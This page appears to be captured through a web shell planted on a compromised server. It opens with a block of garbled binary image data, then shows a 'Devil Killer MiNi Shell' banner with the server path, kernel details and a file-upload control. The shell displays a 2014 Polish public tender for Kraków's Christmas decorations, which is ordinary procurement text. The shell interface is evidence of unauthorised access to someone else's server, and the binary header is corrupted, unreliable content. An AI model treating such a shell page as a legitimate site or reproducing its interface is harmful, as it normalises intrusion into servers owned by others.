JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141027/225969-N-2014.html

<p class="kh_header"><b>Kraków: Dekoracja świąteczna i noworoczna
Miasta Krakowa z podziałem na części:
Część 1: Dekoracja ulic.
Część 2: Dekoracja lamp.
Część 3: Dekoracja drzew.
Część 4: Dekoracja mostów.
Część 5: Dekoracja i ustawienie 2 sztuk choinek.
Część 6: Ustawienie bombek.
Część 7: Ustawienie aniołów świetlnych dużych i małych i choinki świetlnej (wraz z magazynowaniem).
Znak sprawy: 14/X/2014</b><br>
<b>Numer ogłoszenia: 225969 - 2014; data zamieszczenia: 27.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Infrastruktury Komunalnej i Transportu w Krakowie , ul. Centralna 53, 31-586 Kraków, woj. małopolskie, tel. 012 616 74 19, faks 012 616 74 17.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zikit.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dekoracja świąteczna i noworoczna
Miasta Krakowa z podziałem na części:
Część 1: Dekoracja ulic.
Część 2: Dekoracja lamp.
Część 3: Dekoracja drzew.
Część 4: Dekoracja mostów.
Część 5: Dekoracja i ustawienie 2 sztuk choinek.
Część 6: Ustawienie bombek.
Część 7: Ustawienie aniołów świetlnych dużych i małych i choinki świetlnej (wraz z magazynowaniem).
Znak sprawy: 14/X/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opis przedmiotu zamówienia: 
a)Przedmiotem niniejszego zamówienia jest usługa polegająca na wykonaniu dekoracji świątecznej Miasta Krakowa. Dekorację należy wykonać na podstawie sporządzonych przez Wykonawcę i zaakceptowanych przez Zamawiającego projektów (graficzne projekty dekoracji oraz poszczególne jej elementy Wykonawca zobowiązany jest załączyć do oferty). Z uwagi na specyfikę i zróżnicowanie usługi - przetarg podzielono na siedem części. 
Po zakończeniu ekspozycji - elementy dekoracji przechodzą na własność Wykonawcy, oprócz aniołów i choinki świetlnej.
Koszty energii wykorzystanej do oświetlenia dekoracji pokrywa Zamawiający. 
Szczegółowy opis przedmiotu zamówienia oraz warunki wykonania prac określają załączniki do niniejszej SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych do 1,4 % wartości zamówienia podstawowego. Zostaną one udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia przedmiotu zamówienia oraz zapewnione zostaną środki finansowe na ten cel.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wymagania dotyczące wadium:
1)Przystępując do przetargu wykonawca zobowiązany jest wnieść wadium przetargowe w wysokości:  
- część 1 -  4.000,00 zł (cztery tysiące złotych), 
- część 2 -  1.000,00 zł (jeden tysiąc złotych),
- część 3 -  2.100,00 zł (dwa tysiące sto złotych), 
- część 4 -  2.500,00 zł (dwa tysiące pięćset złotych),
- część 5 -  3.500,00 zł (trzy tysiące pięćset złotych),
- część 6 -  2.000,00 zł  (dwa tysiące złotych), 
- część 7 -  1.700,00 zł  (jeden tysiąc siedemset złotych), 
Wadium należy wnieść przed upływem terminu składania ofert.
2)Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).
3)Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto depozytowe w Banku Pekao S.A. - nr rachunku: 32124047221111000048503855.
4)Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania rachunku bankowego zamawiającego.
5)Wadium wnoszone w formie innej niż pieniężna należy złożyć w formie oryginału w kasie ZIKiT w Krakowie, ul. Centralna 53 , przed terminem składania ofert, natomiast do oferty należy załączyć kopię potwierdzoną -za zgodność z oryginałem.
6)Zwrot wadium przetargowego nastąpi zgodnie z art. 46 Pzp.
7)Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli wystąpią przesłanki określone w art. 46 ust. 5 Pzp oraz jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa a w art. 25 ust. 1, lub pełnomocnictw,  listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.  Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału nie później niż w dniu, w którym upłynął termin składania ofert (art. 26 ust. 3 oraz 46 ust. 4a ustawy Pzp).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert zrealizowali zamówienie podobne do przedmiotu zamówienia t.j. wykonali dekorację z okazji  Świąt  Bożego Narodzenia i Nowego Roku w dużych miastach, o liczebności  powyżej 100 tysięcy mieszkańców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej   działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Ocena spełnienia przez wykonawcę warunków o których mowa w niniejszym ogłoszeniu nastąpi na podstawie przedłożonych w ofercie oświadczeń lub dokumentów ( wg zasady spełnia - nie spełnia ), których wykaz został określony w ogłoszeniu. 2.Ponadto do oferty należy załączyć:a)pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej; b)pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się o zamówienie tzw. konsorcja oraz spółek cywilnych); c)wypełniony formularz oferty - wg załącznika nr 1; d)wypełniony załącznik zawierający ceny (wg załączonych wzorów) - na część/części, których dotyczy oferta; e)graficzny projekt dekoracji oraz poszczególnych jej elementów odrębnie dla każdej z części, których dotyczy oferta; f)kserokopię dowodu wniesienia wadium
3.W przypadku wykonawców składających wspólną ofertę, każdy z wykonawców musi złożyć dokumenty a) oświadczenie o spełnieniu warunku udziału w postępowaniu wraz z oświadczeniem o braku podstaw do wykluczenia b) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust.1 pkt 2 ustawy c) listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacje o tym , ze nie należy do grupy kapitałowej. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. 4.Wszyscy wykonawcy składający wspólną ofertę będą ponosić odpowiedzialność solidarną za wykonanie umowy. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy od wszystkich wykonawców łącznie lub od każdego z osobna. 5.Spółka cywilna, jest kwalifikowana jako wykonawcy wspólnie ubiegający się o udzielenie zamówienia dlatego jej wspólnicy zobowiązani są ustanowić pełnomocnika do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do oferty. Ponadto, każdy ze wspólników spółki cywilnej zobowiązany jest załączyć dokumenty wymienione w punkcie 3. 6.Dokumenty wymagane w niniejszym ogłoszeniu muszą być przedstawione w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę tj. osobę(y) uprawnioną/upełnomocnioną do reprezentowania. 7.Niedostarczenie któregokolwiek z wymaganych w ogłoszeniu dokumentów spowoduje wykluczenie wykonawcy lub odrzucenie oferty z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Graficzny projekt dekoracji - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w szczególności terminu realizacji jeżeli wystąpią przesłanki tj. konieczność tej zmiany będzie wynikać z okoliczności których nie dało się przewidzieć w chwili zawarcia umowy np. zmiana osób nadzorujących. Zmiana nie może być niekorzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zikit.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Infrastruktury Komunalnej i Transportu w Krakowie, 31-586 Kraków, ul.Centralna 53 - Punkt Obsługi Klienta (od pn.do pt.w godz.11:30-14:30) lub pobrać ze strony internetowej Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2014 godzina 11:00, miejsce: Zarząd Infrastruktury Komunalnej i Transportu w Krakowie, 31-586 Kraków, ul.Centralna 53 - sekretariat p.118 ( budynek B ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Uprawnieni do porozumiewania się z wykonawcami:
Miłosz Świda - Kierownik Zespołu Umów i Zamówień Publicznych - tel. (012) 616-71-34 (sprawy proceduralne).
Teresa Kowalińska - Kierownik Zespołu Utrzymania Nieruchomości - tel. (012) 616-86-58, Monika Szwed  - Inspektor w Zespole Utrzymania Nieruchomości - tel. (012) 616-86-55 (sprawy techniczne).  
2.Każdy Wykonawca może złożyć ofertę maksymalnie na cztery części zamówienia (art.83 ust. 3 Pzp)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dekoracja ulic..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Unikatowa dekoracja świąteczna, świetlna, wkomponowana w charakter ulic krakowskich, 
z przewagą elementów dekoracyjnych o bogatej ornamentyce, ze szczególną dominantą ornamentu spiralnego. Dekoracja z zastosowaniem oświetlenia ledowego, w barwach ciepłej żółci, srebra oraz dodatkiem barwy czerwonej. Wysokość maksymalna elementów do 1 m 
w środku zwisu i do 1,4 m po bokach nad chodnikiem (odległość całkowita miedzy liną 
a dolną częścią elementu dekoracyjnego). Zwis oświetlony na co najmniej 80% długości. Moc elementów dekoracyjnych oświetleniowych zamontowanych na zwisie nie może przekroczyć 400W. Atrakcyjny wygląd dekoracji świetlnych zarówno w dzień, jak i w nocy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Graficzny projekt dekoracji - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dekoracja lamp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Unikatowa dekoracja świąteczna, świetlna, wkomponowana w charakter ulic krakowskich, 
z przewagą elementów dekoracyjnych o bogatej ornamentyce, ze szczególną dominantą ornamentu spiralnego. Atrakcyjny wygląd dekoracji świetlnych zarówno w dzień, jak i w nocy.
Dekoracja z zastosowaniem oświetlenia ledowego.
Oświetlenie ledowe  energooszczędne w formie  zwisających płaszczy okalających.
 Moc oświetlenia nie powinna przekroczyć:
- na lampie  400W
- na lampie niskiej nie powinno przekroczyć 100W.
- na słupie oświetleniowym 250W
Kolor dekoracji:  przewaga ciepły złoty, srebrny z dodatkiem czerwieni
Dopuszczalne  motywy  - ornamenty(elementy kręcone i spiralne), wstęgi, bombki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Graficzny projekt dekoracji - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dekoracja drzew.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WYGLĄD - WYTYCZNE
Zamontowanie kurtyn świetlnych ledowych  lub warkoczy świetlnych.
Minimalna ilość na drzewie punktów świetlnych 2100 szt.(światło żółte), w tej ilości musi zawierać 15  diod LED błyskających na każdym drzewie dla poz. 1-3, 5, 6 dla poz.4 minimum 90 sztuk z diodami  błyskającymi.
Na drzewach mają być zamontowane dodatkowe dekoracje dające efekt  spadającego światła, minimalna ilość ok. 320 diod dla poz. 1-3, 5, 6 dla poz.4 ok. 2500 szt. diod
Moc oświetlenia zamontowanego na drzewie nie może przekroczyć dla poz. 1-5  350 W, dla poz. 6  600W
Wykonanie okablowania do podłączenia  oświetlenia drzew do sieci miejskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Graficzny projekt dekoracji - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dekoracja mostów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wygląd zewnętrzny-wytyczne projektowe
1.Dekoracja  umieszczona na przęsłach mostu , o charakterze świątecznym z zastosowaniem   oświetlenia  energooszczędnego ledowego.
Moc oświetlenia nie może przekraczać 2400W
2.Przedstawiony projekt dekoracji powinien oddawać świąteczny wystrój miasta w sposób  oryginalny pozwalając  na uzyskanie najciekawszych efektów wizualnych i jednocześnie energooszczędnych (świetlówki LED)
Dopuszczalna w 2014/2015  kolorystyka  dla całości miasta to:
 -ciepły żółty (złoty) - kolor dominujący
-srebrny
- wyłącznie jako element uzupełniający ciemno-czerwony
3.Dekoracja winna być wykonana na zasadzie kurtyn (płaszczy) świecących i punktowo uzupełniona w drobne ornamenty (kręcone i spiralne) ,bombki, wstęgi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Graficzny projekt dekoracji - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dekoracja i ustawienie 2 sztuk choinek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Choinka w Rynku Głównym 1 szt. WYGLĄD ZEWNĘTRZNY, WYTYCZNE PROJEKTOWE:
Wykonanie z tworzywa sztucznego imitującego naturalne drzewo (z efektem gałązek)
Wysokość choinki - 15m -Konstrukcja stalowa-Kształt choinki stożkowy na planie koła (średnica podstawy ok. 6 m)OŚWIETLENIE:Dekoracja choinki poprzez zastosowanie dużej ilości świateł z efektem flach.-Ilość punktów świetlnych: co najmniej 45000 szt.- Kolorystyka oświetlenia: ciepłe-białe i zimne białe z efektem migotania.Oświetlenie energooszczędne ledowe równomiernie ułożone na choince (z zastosowaniem sznurów świetlnych z efektem flach)DEKORACJA :Ozdoby: bombki o zróżnicowanych wielkościach w kolorze błyszczącym złotym i złotym matowym, girlandy z punktami świetlnymi, w uzupełnieniu dekoracji bombki w kolorze srebrnym lub drobne elementy dekoracyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.89.00-6, 45.45.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
